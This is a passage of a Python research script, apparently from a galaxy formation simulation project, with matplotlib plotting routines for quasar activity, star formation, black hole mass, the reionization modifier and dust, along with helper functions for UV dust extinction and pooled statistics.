outputFile1 = './photonfraction/file{0}_snap{1}_{2}{3}'.format(filenr, snapshot, output_tag, output_format)
plt.tight_layout()
plt.savefig(outputFile1)
print("Saved to {0}".format(outputFile1))
plt.close()
###
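# AllVars.Calculate_Histogram is project-specific; as an assumption, a numpy
# stand-in returning the same (counts, bin_edges, bin_middle) triple for
# fixed-width bins over [low, high] could look like this (the internal "flag"
# argument of the real routine is omitted):
import numpy as np

def calc_histogram_sketch(data, bin_width, low, high):
    edges = np.arange(low, high + bin_width, bin_width)  # Fixed-width bin edges.
    counts, edges = np.histogram(data, bins=edges)
    middle = edges[:-1] + 0.5 * bin_width  # Bin centres, as plotted above.
    return counts, edges, middle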
def plot_quasar_substep(snapshot, filenr, output_tag, substep):
ax1 = plt.subplot(111)
counts, bin_edges, bin_middle = AllVars.Calculate_Histogram(substep, 0.1, 0, 0, 10)
ax1.plot(bin_middle, counts, lw = PlotScripts.global_linewidth, color = 'r')
ax1.axvline(np.mean(substep[substep != -1]), lw = 0.5, ls = '-')
ax1.set_yscale('log', nonposy='clip')
ax1.set_xlabel(r"$\mathrm{Substep \: Quasar \: Activity}$")
ax1.set_ylabel(r"$\mathrm{Count}$")
# ax1.set_ylim([1e1, 1e5])
outputFile1 = './substep_activity/file{0}_snap{1}_{2}{3}'.format(filenr, snapshot, output_tag, output_format)
plt.tight_layout()
plt.savefig(outputFile1)
print("Saved to {0}".format(outputFile1))
plt.close()
###
def plot_post_quasar_SFR(PlotSnapList, model_number, Gal, output_tag):
ax1 = plt.subplot(111)
ax2 = ax1.twinx()
count = 0
snapshot_thickness = 20 # How many snapshots before/after the quasar event do we want to track?
for snapshot_idx in PlotSnapList[model_number]:
w = np.where((G.QuasarActivity[:, snapshot_idx] == 1) & (G.LenHistory[:, snapshot_idx] > 200.0) & (G.GridStellarMass[:, snapshot_idx] > 0.001))[0]
w_slice_gridhistory = G.GridHistory[w,snapshot_idx-snapshot_thickness:snapshot_idx+snapshot_thickness]
potential_gal = []
for i in range(len(w_slice_gridhistory)):
ww = np.where((w_slice_gridhistory[i] >= 0))[0]
if (len(ww) == snapshot_thickness * 2):
potential_gal.append(w[i])
if (len(potential_gal) == 0):
return
count += 1
print("There were {0} galaxies that had an energetic quasar wind event at snapshot {1} (z = {2:.3f})".format(len(potential_gal), snapshot_idx, AllVars.SnapZ[snapshot_idx]))
chosen_gal = potential_gal[0] # Take the first qualifying galaxy; indexing [1] would fail when only one galaxy qualifies.
lenhistory_array = np.empty((int(snapshot_thickness*2 + 1)))
SFR_array = np.empty((int(snapshot_thickness*2 + 1)))
gridhistory_array = np.empty((int(snapshot_thickness*2 + 1)))
coldgas_array = np.empty((int(snapshot_thickness*2 + 1)))
t = np.empty((int(snapshot_thickness*2 + 1)))
for i in range(-snapshot_thickness, snapshot_thickness+1):
#print("SFR {0} {1}".format(snapshot_idx + i, G.GridSFR[chosen_gal, snapshot_idx+i]))
#print("ColdGas {0} {1}".format(snapshot_idx + i, G.GridColdGas[chosen_gal, snapshot_idx+i]))
lenhistory_array[i+snapshot_thickness] = (G.LenHistory[chosen_gal, snapshot_idx+i])
SFR_array[i+snapshot_thickness] = (G.GridSFR[chosen_gal, snapshot_idx+i]) #- (G.GridSFR[chosen_gal, snapshot_idx])
gridhistory_array[i+snapshot_thickness] = (G.GridHistory[chosen_gal, snapshot_idx+i])
coldgas_array[i+snapshot_thickness] = (G.GridColdGas[chosen_gal, snapshot_idx+i] * 1.0e10 / AllVars.Hubble_h) #- (G.GridColdGas[chosen_gal, snapshot_idx])
t[i+snapshot_thickness] = (-AllVars.Lookback_Time[snapshot_idx+i] + AllVars.Lookback_Time[snapshot_idx]) * 1.0e3
print("Len History {0}".format(lenhistory_array))
print("Grid History {0}".format(gridhistory_array))
print("Cold Gas {0}".format(coldgas_array))
print("SFR {0}".format(SFR_array))
stellarmass_text = r"$\log_{{10}} M_* = {0:.2f} \: M_\odot$".format(np.log10(G.GridStellarMass[chosen_gal, snapshot_idx] * 1.0e10 / AllVars.Hubble_h))
Ndym_text = "Dynamical Time = {0:.2f} Myr".format(G.DynamicalTime[chosen_gal, snapshot_idx])
z_text = "z = {0:.2f}".format(AllVars.SnapZ[snapshot_idx])
ax1.text(0.05, 0.95, z_text, transform = ax1.transAxes, fontsize = PlotScripts.global_fontsize - 4)
ax1.text(0.05, 0.9, stellarmass_text, transform = ax1.transAxes, fontsize = PlotScripts.global_fontsize - 4)
ax1.text(0.05, 0.85, Ndym_text, transform = ax1.transAxes, fontsize = PlotScripts.global_fontsize - 4)
ax1.plot(t, SFR_array, color = 'r', lw = PlotScripts.global_linewidth)
ax2.plot(t, coldgas_array, color = 'b', lw = PlotScripts.global_linewidth)
ax1.set_xlabel(r"$\mathrm{Time \: Since \: Quasar \: Event \: [Myr]}$", size = PlotScripts.global_labelsize - 10)
# ax1.set_ylabel(r"$\mathrm{Fractional \: SFR \: Relative \: To \: SFR_{Quasar}}$", size = PlotScripts.global_labelsize - 10)
# ax2.set_ylabel(r"$\mathrm{Difference \: Cold \: Gas \: Mass \: Relative \: To \: Cold_{Quasar}}$", size = PlotScripts.global_labelsize - 10)
ax1.set_ylabel(r"$\mathrm{SFR} \: [\mathrm{M}_\odot \mathrm{yr}^{-1}]$", size = PlotScripts.global_labelsize - 10)
ax2.set_ylabel(r"$\mathrm{Cold \: Gas \: Mass \: [\mathrm{M}_\odot]}$",size = PlotScripts.global_labelsize - 10)
ax1.set_yscale('log', nonposy='clip')
ax2.set_yscale('log', nonposy='clip')
ax1.plot(np.nan, np.nan, color = 'r', label = r"$\mathrm{SFR}$")
ax1.plot(np.nan, np.nan, color = 'b', label = r"$\mathrm{Cold \: Gas}$")
leg = ax1.legend(loc='upper right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile = "{0}_galaxy{1}{2}".format(output_tag, chosen_gal, output_format)
plt.tight_layout()
plt.savefig(outputFile)
print("Saved to {0}".format(outputFile))
plt.close()
exit()
###
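# The selection in plot_post_quasar_SFR above keeps only galaxies whose grid
# history is defined (non-negative) across the full window around the quasar
# event.  A self-contained sketch of that window test (the helper name is
# hypothetical):
import numpy as np

def galaxies_with_full_window(grid_history, candidates, snap, thickness):
    """Return the candidate rows whose history is >= 0 over snap +/- thickness."""
    # Mirrors the slice used above: [snap - thickness, snap + thickness).
    window = grid_history[candidates, snap - thickness:snap + thickness]
    good = (window >= 0).all(axis=1)
    return [gal for gal, ok in zip(candidates, good) if ok]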
def plot_stellarmass_blackhole(SnapList, simulation_norm, mean_galaxy_BHmass,
std_galaxy_BHmass, N_galaxy_BHmass, FirstFile,
LastFile, NumFile, model_tags, output_tag):
master_mean_SMBH, master_std_SMBH, master_N, master_bin_middle = \
collect_across_tasks(mean_galaxy_BHmass, std_galaxy_BHmass,
N_galaxy_BHmass, SnapList, SnapList, True,
m_gal_low, m_gal_high)
if rank == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
for model_number in range(0, len(SnapList)):
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
box_factor = (LastFile[model_number] - FirstFile[model_number] + 1.0)/(NumFile[model_number]) # This factor allows us to take a sub-volume of the box and scale the results to represent the entire box.
norm = pow(AllVars.BoxSize,3) / pow(AllVars.Hubble_h, 3) * bin_width * box_factor
for snapshot_idx in range(0, len(SnapList[model_number])):
w = np.where((master_N[model_number][snapshot_idx] > 0.0))[0]
mean = np.log10(master_mean_SMBH[model_number][snapshot_idx][w])
upper = np.log10(np.add(master_mean_SMBH[model_number][snapshot_idx][w],
master_std_SMBH[model_number][snapshot_idx][w]))
lower = np.log10(np.subtract(master_mean_SMBH[model_number][snapshot_idx][w],
master_std_SMBH[model_number][snapshot_idx][w]))
label = "z = {0:.2f}" \
.format(AllVars.SnapZ[SnapList[model_number][snapshot_idx]])
ax1.plot(master_bin_middle[model_number][snapshot_idx][w],
mean, label = label, color = PlotScripts.colors[snapshot_idx],
ls = PlotScripts.linestyles[model_number],
lw = PlotScripts.global_linewidth, rasterized = True)
#ax1.fill_between(bin_middle_stellar_array[model_number][snapshot_idx][w], lower, upper, color = PlotScripts.colors[model_number], alpha = 0.25)
ax2.plot(master_bin_middle[model_number][snapshot_idx][w],
master_N[model_number][snapshot_idx][w] / norm,
label = label, ls = PlotScripts.linestyles[model_number],
lw = PlotScripts.global_linewidth, rasterized = True)
Obs.Get_Data_SMBH()
PlotScripts.plot_SMBH_z8(ax1)
ax1.set_xlabel(r"$\log_{10}\mathrm{M}_* [\mathrm{M}_\odot]$", size = PlotScripts.global_fontsize)
ax1.set_ylabel(r"$\log_{10}\mathrm{M}_\mathrm{BH} [\mathrm{M}_\odot]$", size = PlotScripts.global_fontsize)
ax2.set_xlabel(r"$\log_{10}\mathrm{M}_\mathrm{BH} [\mathrm{M}_\odot]$", size = PlotScripts.global_fontsize)
ax2.set_ylabel(r'$\Phi\ [\mathrm{Mpc}^{-3}\: \mathrm{dex}^{-1}]$', fontsize = PlotScripts.global_fontsize)
ax2.set_yscale('log', nonposy='clip')
ax1.set_xticks(np.arange(7.0, 12.0))
ax1.set_yticks(np.arange(3.0, 12.0))
ax1.xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax1.yaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax1.set_xlim([7.0, 10.25])
ax1.set_ylim([3.0, 8.0])
leg = ax1.legend(loc='upper left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
leg = ax2.legend(loc='lower left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile = "{0}{1}".format(output_tag, output_format)
plt.tight_layout()
fig.savefig(outputFile)
print("Saved to {0}".format(outputFile))
plt.close(fig)
outputFile2 = "{0}_MF{1}".format(output_tag, output_format)
plt.tight_layout()
fig2.savefig(outputFile2)
print("Saved to {0}".format(outputFile2))
plt.close(fig2)
###
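# plot_stellarmass_blackhole above plots log10 of the mean and of mean +/- std.
# Note that mean - std can be non-positive, in which case np.log10 yields
# nan/-inf and matplotlib silently drops those points.  A sketch of the band
# computation (hypothetical helper):
import numpy as np

def log_band(mean, std):
    """Return (log_mean, log_upper, log_lower) for a mean +/- std band."""
    mean = np.asarray(mean, dtype=float)
    std = np.asarray(std, dtype=float)
    with np.errstate(divide="ignore", invalid="ignore"):  # Allow log10(<=0).
        return (np.log10(mean),
                np.log10(np.add(mean, std)),
                np.log10(np.subtract(mean, std)))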
def plot_reionmod(PlotSnapList, SnapList, simulation_norm, mean_reionmod_halo,
std_reionmod_halo, N_halo, mean_reionmod_z, std_reionmod_z,
N_reionmod, plot_z, model_tags, output_tag):
"""
Plot the reionization modifier as a function of halo mass and redshift.
Parameters
----------
PlotSnapList, SnapList: 2D Nested arrays of integers. Outer length is equal to the number of models and inner length is number of snapshots we're plotting/calculated for.
PlotSnapList contains the snapshots for each model we will plot for the halo mass figure.
SnapList contains the snapshots for each model that we have performed calculations for. These aren't equal because we don't want to plot halo curves for ALL redshifts.
simulation_norm: Array of integers. Length is equal to the number of models.
Contains the simulation identifier for each model. Used to set the parameters of each model.
mean_reionmod_halo, std_reionmod_halo: 3D Nested arrays of floats. The outer length is equal to the number of models, the next length is the number of snapshots for each model, and the inner-most length is the number of halo mass bins (given by NB).
Contains the mean/standard deviation values for the reionization modifier as a function of halo mass.
NOTE: These are unique for each task.
N_halo: 3D Nested arrays of floats. Lengths are identical to mean_reionmod_halo.
Contains the number of halos in each halo mass bin.
NOTE: These are unique for each task.
mean_reionmod_z, std_reionmod_z: 2D Nested arrays of floats. Outer length is equal to the number of models, inner length is the number of snapshots for each model. NOTE: This inner length can be different to the length of PlotSnapList as we don't necessarily need to plot for every snapshot we calculate.
Contains the mean/standard deviation values for the reionization modifier as a function of redshift.
NOTE: These are unique for each task.
N_reionmod: 2D Nested arrays of floats. Lengths are identical to mean_reionmod_z.
Contains the number of galaxies at each redshift that have a non-negative reionization modifier. A negative reionization modifier corresponds to a galaxy that didn't have infall/stripping during the snapshot.
NOTE: These are unique for each task.
plot_z: Boolean.
Denotes whether we want to plot the reionization modifier as a function
of redshift. Useful because we often only calculate statistics for a
subset of the snapshots to decrease computation time. For these runs,
we don't want to plot for something that requires ALL snapshots.
model_tags: Array of strings. Length is equal to the number of models.
Contains the legend labels for each model.
output_tag: String.
The prefix for the output file.
Returns
----------
None. Plot is saved in current directory as "./<output_tag>.<output_format>"
"""
master_mean_reionmod_halo, master_std_reionmod_halo, \
master_N_reionmod_halo, master_bin_middle = collect_across_tasks(mean_reionmod_halo,
std_reionmod_halo,
N_halo, SnapList,
PlotSnapList, True,
m_low, m_high)
if plot_z:
master_mean_reionmod_z, master_std_reionmod_z, master_N_reionmod_z, _ = collect_across_tasks(mean_reionmod_z,
std_reionmod_z,
N_reionmod)
if rank == 0:
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
if plot_z:
fig2 = plt.figure()
ax10 = fig2.add_subplot(111)
for model_number in range(len(PlotSnapList)):
if(simulation_norm[model_number] == 1):
cosmo = AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
cosmo = AllVars.Set_Params_Tiamat_extended()
elif(simulation_norm[model_number] == 4):
cosmo = AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
cosmo = AllVars.Set_Params_Kali()
for snapshot_idx in range(len((PlotSnapList[model_number]))):
if snapshot_idx == 0:
label = model_tags[model_number]
else:
label = ""
nonzero_bins = np.where(master_N_reionmod_halo[model_number][snapshot_idx] > 0.0)[0]
ax1.plot(master_bin_middle[model_number][snapshot_idx][nonzero_bins],
master_mean_reionmod_halo[model_number][snapshot_idx][nonzero_bins],
label = label, ls = PlotScripts.linestyles[model_number],
color = PlotScripts.colors[snapshot_idx])
if plot_z:
ax10.plot((AllVars.t_BigBang - AllVars.Lookback_Time[SnapList[model_number]])*1.0e3, master_mean_reionmod_z[model_number], color = PlotScripts.colors[model_number], label = model_tags[model_number], ls = PlotScripts.linestyles[model_number], lw = 3)
for count, snapshot_idx in enumerate(PlotSnapList[model_number]):
#label = r"$\mathbf{z = " + str(int(round(AllVars.SnapZ[snapshot_idx]))) + "}$"
label = r"$\mathbf{z = " + str(AllVars.SnapZ[snapshot_idx]) + "}$"
ax1.plot(np.nan, np.nan, ls = PlotScripts.linestyles[0], color =
PlotScripts.colors[count], label = label)
ax1.set_xlim([8.5, 11.5])
ax1.set_ylim([0.0, 1.05])
ax1.set_xlabel(r'$\mathbf{log_{10} \: M_{vir} \:[M_{\odot}]}$', fontsize = PlotScripts.global_labelsize)
ax1.set_ylabel(r'$\mathbf{Mean \: ReionMod}$', fontsize = PlotScripts.global_labelsize)
leg = ax1.legend(loc='lower right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile1 = "./{0}_halo{1}".format(output_tag, output_format)
fig1.savefig(outputFile1, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile1))
plt.close(fig1)
if plot_z:
ax10.set_xlabel(r"$\mathbf{Time \: since \: Big \: Bang \: [Myr]}$", fontsize = PlotScripts.global_labelsize)
tick_locs = np.arange(200.0, 1000.0, 100.0)
tick_labels = [r"$\mathbf{%d}$" % x for x in tick_locs]
ax10.xaxis.set_major_locator(mtick.MultipleLocator(100))
ax10.set_xticklabels(tick_labels, fontsize = PlotScripts.global_fontsize)
ax10.set_xlim(PlotScripts.time_xlim)
ax10.set_ylabel(r'$\mathbf{Mean \: ReionMod}$', fontsize = PlotScripts.global_labelsize)
ax11 = ax10.twiny()
t_plot = (AllVars.t_BigBang - cosmo.lookback_time(PlotScripts.z_plot).value) * 1.0e3 # Corresponding Time values on the bottom.
z_labels = ["$\mathbf{%d}$" % x for x in PlotScripts.z_plot] # Properly Latex-ize the labels.
ax11.set_xlabel(r"$\mathbf{z}$", fontsize = PlotScripts.global_labelsize)
ax11.set_xlim(PlotScripts.time_xlim)
ax11.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax11.set_xticklabels(z_labels, fontsize = PlotScripts.global_fontsize) # But label them as redshifts.
leg = ax10.legend(loc='lower right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile2 = "./{0}_z{1}".format(output_tag, output_format)
fig2.savefig(outputFile2, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile2))
plt.close(fig2)
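# The redshift figure above labels a twin top axis in redshift while the bottom
# axis carries time since the Big Bang. The same trick in isolation, using a toy
# (non-cosmological) time(z) mapping in place of the AllVars/cosmo lookback times:

```python
import matplotlib
matplotlib.use("Agg")  # headless backend so the sketch runs without a display
import matplotlib.pyplot as plt
import numpy as np

def t_of_z(z):
    # Toy time-since-Big-Bang [Myr] for redshift z; purely illustrative,
    # standing in for AllVars.t_BigBang - cosmo.lookback_time(z).
    return 1000.0 / (1.0 + z)

z_ticks = [6, 8, 10]
fig, ax_bottom = plt.subplots()
zs = np.linspace(5, 12, 50)
ax_bottom.plot(t_of_z(zs), np.linspace(0.0, 1.0, 50))
ax_bottom.set_xlabel("Time since Big Bang [Myr]")

ax_top = ax_bottom.twiny()             # second x-axis sharing the same y-axis
ax_top.set_xlim(ax_bottom.get_xlim())  # align the two axes' data ranges
ax_top.set_xticks([t_of_z(z) for z in z_ticks])    # ticks at the matching times...
ax_top.set_xticklabels([str(z) for z in z_ticks])  # ...but labelled as redshifts
ax_top.set_xlabel("z")
top_labels = [t.get_text() for t in ax_top.get_xticklabels()]
plt.close(fig)
```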
##
def plot_dust(PlotSnapList, SnapList, simulation_norm, mean_dust_galaxy, std_dust_galaxy,
N_galaxy, mean_dust_halo, std_dust_halo, N_halo, plot_z,
model_tags, output_tag):
"""
"""
master_mean_dust_galaxy, master_std_dust_galaxy, master_N_dust_galaxy, master_bin_middle_galaxy = \
collect_across_tasks(mean_dust_galaxy, std_dust_galaxy, N_galaxy, SnapList,
PlotSnapList, True, m_gal_low, m_gal_high)
master_mean_dust_halo, master_std_dust_halo, master_N_dust_halo, master_bin_middle_halo = \
collect_across_tasks(mean_dust_halo, std_dust_halo, N_halo, SnapList,
PlotSnapList, True, m_low, m_high)
if rank == 0:
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
for model_number in range(len(PlotSnapList)):
if(simulation_norm[model_number] == 1):
cosmo = AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
cosmo = AllVars.Set_Params_Tiamat_extended()
elif(simulation_norm[model_number] == 4):
cosmo = AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
cosmo = AllVars.Set_Params_Kali()
for snapshot_idx in range(len((PlotSnapList[model_number]))):
if snapshot_idx == 0:
label = model_tags[model_number]
else:
label = ""
nonzero_bins = np.where(master_N_dust_galaxy[model_number][snapshot_idx] > 0.0)[0]
ax1.plot(master_bin_middle_galaxy[model_number][snapshot_idx][nonzero_bins],
master_mean_dust_galaxy[model_number][snapshot_idx][nonzero_bins],
label = label, ls = PlotScripts.linestyles[model_number],
color = PlotScripts.colors[snapshot_idx])
nonzero_bins = np.where(master_N_dust_halo[model_number][snapshot_idx] > 0.0)[0]
ax2.plot(master_bin_middle_halo[model_number][snapshot_idx][nonzero_bins],
master_mean_dust_halo[model_number][snapshot_idx][nonzero_bins],
label = label, ls = PlotScripts.linestyles[model_number],
color = PlotScripts.colors[snapshot_idx])
print(master_mean_dust_halo[model_number][snapshot_idx])
for count, snapshot_idx in enumerate(PlotSnapList[model_number]):
#label = r"$\mathbf{z = " + str(int(round(AllVars.SnapZ[snapshot_idx]))) + "}$"
label = r"$\mathbf{z = " + str(AllVars.SnapZ[snapshot_idx]) + "}$"
ax1.plot(np.nan, np.nan, ls = PlotScripts.linestyles[0], color =
PlotScripts.colors[count], label = label)
ax2.plot(np.nan, np.nan, ls = PlotScripts.linestyles[0], color =
PlotScripts.colors[count], label = label)
ax1.set_xlim([2.0, 10.5])
#ax1.set_ylim([1.0, 6.0])
ax1.set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$', fontsize = PlotScripts.global_labelsize)
ax1.set_ylabel(r'$\mathbf{log_{10} \: \langle M_{Dust}\rangle_{M*}}$', fontsize = PlotScripts.global_labelsize)
leg = ax1.legend(loc='upper left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile1 = "./{0}_galaxy{1}".format(output_tag, output_format)
fig1.savefig(outputFile1, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile1))
plt.close(fig1)
ax2.set_xlim([6.8, 11.5])
#ax2.set_ylim([1.0, 6.0])
ax2.set_xlabel(r'$\mathbf{log_{10} \: M_{vir} \:[M_{\odot}]}$', fontsize = PlotScripts.global_labelsize)
ax2.set_ylabel(r'$\mathbf{log_{10} \: \langle M_{Dust}\rangle_{Mvir}}$', fontsize = PlotScripts.global_labelsize)
leg = ax2.legend(loc='upper left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile2 = "./{0}_halo{1}".format(output_tag, output_format)
fig2.savefig(outputFile2, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile2))
plt.close(fig2)
def plot_dust_scatter(SnapList, mass_gal, mass_halo, mass_dust, output_tag):
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
fig3 = plt.figure()
ax3 = fig3.add_subplot(111, projection='3d')
fig4 = plt.figure()
ax4 = fig4.add_subplot(111)
ax1.scatter(mass_gal, mass_dust)
ax2.scatter(mass_halo, mass_dust)
#ax3.scatter(mass_gal, mass_halo, mass_dust)
hb = ax4.hexbin(mass_halo, mass_dust, bins='log', cmap='inferno')
ax1.set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$', fontsize = PlotScripts.global_labelsize)
ax1.set_ylabel(r'$\mathbf{log_{10} \: M_{Dust}}$', fontsize = PlotScripts.global_labelsize)
ax2.set_xlabel(r'$\mathbf{log_{10} \: M_{vir} \:[M_{\odot}]}$', fontsize = PlotScripts.global_labelsize)
ax2.set_ylabel(r'$\mathbf{log_{10} \: M_{Dust}}$', fontsize = PlotScripts.global_labelsize)
ax4.set_xlabel(r'$\mathbf{log_{10} \: M_{vir} \:[M_{\odot}]}$', fontsize = PlotScripts.global_labelsize)
ax4.set_ylabel(r'$\mathbf{log_{10} \: M_{Dust}}$', fontsize = PlotScripts.global_labelsize)
cb = fig4.colorbar(hb, ax=ax4)
cb.set_label('log10(N)')
outputFile1 = "./{0}_galaxy{1}".format(output_tag, output_format)
fig1.savefig(outputFile1, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile1))
plt.close(fig1)
outputFile2 = "./{0}_halo{1}".format(output_tag, output_format)
fig2.savefig(outputFile2, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile2))
plt.close(fig2)
#outputFile3 = "./{0}_3D{1}".format(output_tag, output_format)
#fig3.savefig(outputFile3, bbox_inches='tight') # Save the figure
#print('Saved file to {0}'.format(outputFile3))
#plt.close(fig3)
outputFile4 = "./{0}_hexbin{1}".format(output_tag, output_format)
fig4.savefig(outputFile4, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile4))
plt.close(fig4)
### Here ends the plotting functions. ###
### Here begins the functions that calculate various properties for the galaxies (fesc, Magnitude etc). ###
def Calculate_HaloPartStellarMass(halo_part, stellar_mass, bound_low, bound_high):
'''
Calculates the stellar mass for galaxies whose host halos contain a specified number of particles.
Parameters
----------
halo_part : array
Array containing the number of particles inside each halo.
stellar_mass : array
Array containing the Stellar Mass for each galaxy (entries align with HaloPart). Units of log10(Msun).
bound_low, bound_high : int
We calculate the Stellar Mass of galaxies whose host halo satisfies bound_low <= halo_part <= bound_high.
Returns
-------
mass, mass_std : float
Mean and standard deviation stellar mass of galaxies whose host halo has number of particles between the specified bounds. Units of log10(Msun)
Units
-----
Input Stellar Mass is in units of log10(Msun).
Output mean/std Stellar Mass is in units of log10(Msun).
'''
w = np.where((halo_part >= bound_low) & (halo_part <= bound_high))[0] # Find the halos with particle number between the bounds.
mass = np.mean(10**(stellar_mass[w]))
mass_std = np.std(10**(stellar_mass[w]))
return np.log10(mass), np.log10(mass_std)
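# The cut-then-average pattern above can be exercised standalone; the helper
# name and toy data below are illustrative, not part of the pipeline.

```python
import numpy as np

def mean_mass_in_halo_cut(halo_part, stellar_mass, bound_low, bound_high):
    """Mean log10 stellar mass of galaxies whose host halo particle count
    satisfies bound_low <= halo_part <= bound_high. The average is taken in
    linear space and converted back to log10(Msun)."""
    w = np.where((halo_part >= bound_low) & (halo_part <= bound_high))[0]
    return np.log10(np.mean(10.0 ** stellar_mass[w]))

halo_part = np.array([10, 40, 45, 200])         # particles per host halo
stellar_mass = np.array([7.0, 8.0, 8.0, 10.0])  # log10(Msun)
# Only the two halos with 32 <= N <= 50 pass the cut; both host 10^8 Msun.
mean_mass = mean_mass_in_halo_cut(halo_part, stellar_mass, 32, 50)
```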
##
def calculate_UV_extinction(z, L, M):
'''
Calculates the observed UV magnitude after dust extinction is accounted for.
Parameters
----------
z : float
Redshift we are calculating the extinction at.
L, M : array, length equal to the number of galaxies at this snapshot.
Array containing the UV luminosities and magnitudes.
Returns
-------
M_UV_obs : array, length equal to the number of galaxies at this snapshot.
Array containing the observed UV magnitudes.
Units
-----
Luminosities are in units of log10(erg s^-1 A^-1).
Magnitudes are in the AB system.
'''
M_UV_bins = np.arange(-24, -16, 0.1)
A_mean = np.zeros(len(M_UV_bins)) # A_mean is the average UV extinction for a given UV bin.
for j in range(0, len(M_UV_bins)):
beta = calculate_beta(M_UV_bins[j], z) # Fits the beta parameter for this redshift/UV bin.
dist = np.random.normal(beta, 0.34, 10000) # Generates a normal distribution with mean beta and standard deviation of 0.34.
A = 4.43 + 1.99*dist
A[A < 0] = 0 # Negative extinctions don't make sense.
A_mean[j] = np.mean(A)
indices = np.digitize(M, M_UV_bins) # Bins the simulation magnitude into the MUV bins. Note that digitize defines an index i if bin[i-1] <= x < bin[i] whereas I prefer bin[i] <= x < bin[i+1]
dust = A_mean[indices]
flux = AllVars.Luminosity_to_Flux(L, 10.0) # Calculate the flux from a distance of 10 parsec, units of log10(erg s^-1 A^-1 cm^-2).
flux_observed = flux - 0.4*dust
f_nu = AllVars.spectralflux_wavelength_to_frequency(10**flux_observed, 1600) # Spectral flux density in Jansky.
M_UV_obs = -2.5 * np.log10(f_nu) + 8.90 # AB Magnitude from http://www.astro.ljmu.ac.uk/~ikb/convert-units/node2.html
return M_UV_obs
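# The Monte Carlo step at the heart of the routine (drawing scattered UV slopes
# and averaging the implied extinction) can be tested standalone. The relation
# A = 4.43 + 1.99*beta and the 0.34 scatter are taken from the code above; the
# seeded generator is an addition for reproducibility.

```python
import numpy as np

def mean_extinction(beta, scatter=0.34, n_draws=10000, seed=42):
    """Average UV extinction for a given UV slope beta: draw slopes from a
    Gaussian of width `scatter`, map them through A = 4.43 + 1.99*beta,
    and clip unphysical negative extinctions to zero before averaging."""
    rng = np.random.default_rng(seed)
    dist = rng.normal(beta, scatter, n_draws)
    A = 4.43 + 1.99 * dist
    A[A < 0] = 0.0
    return np.mean(A)
```

Note that the clipping biases the mean upward whenever the scattered distribution crosses zero, which is why steep (very negative beta) bins do not go to negative extinction.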
##
def update_cumulative_stats(mean_pool, std_pool, N_pool, mean_local, std_local, N_local):
'''
Update the cumulative statistics (such as Stellar Mass Function, Mvir-Ngamma, fesc-z) that are saved across files.
Pooled mean formulae taken from: https://www.ncbi.nlm.nih.gov/books/NBK56512/
Pooled variance formulae taken from : https://en.wikipedia.org/wiki/Pooled_variance
Parameters
----------
mean_pool, std_pool, N_pool : array of floats with length equal to the number of bins (e.g. the mass bins for the Stellar Mass Function).
The current mean, standard deviation and number of data points within each bin. This is the array that will be updated in this function.
mean_local, std_local, N_local : array of floats with length equal to the number of bins.
The mean, standard deviation and number of data points within each bin that will be added to the pool.
Returns
-------
mean_pool, std_pool : (See above)
The updated pooled mean and standard deviation with the local values folded in. NOTE: Only these two values are returned; the caller is responsible for tracking the updated N_pool (i.e., N_pool + N_local).
Units
-----
All units are kept the same as the input units.
Values are in real-space (not log-space).
'''
N_times_mean_local = np.multiply(N_local, mean_local)
N_times_var_local = np.multiply(N_local - 1, np.multiply(std_local, std_local)) # N - 1 due to Bessel's correction (https://en.wikipedia.org/wiki/Bessel%27s_correction).
N_times_mean_pool = np.add(N_times_mean_local, np.multiply(N_pool, mean_pool))
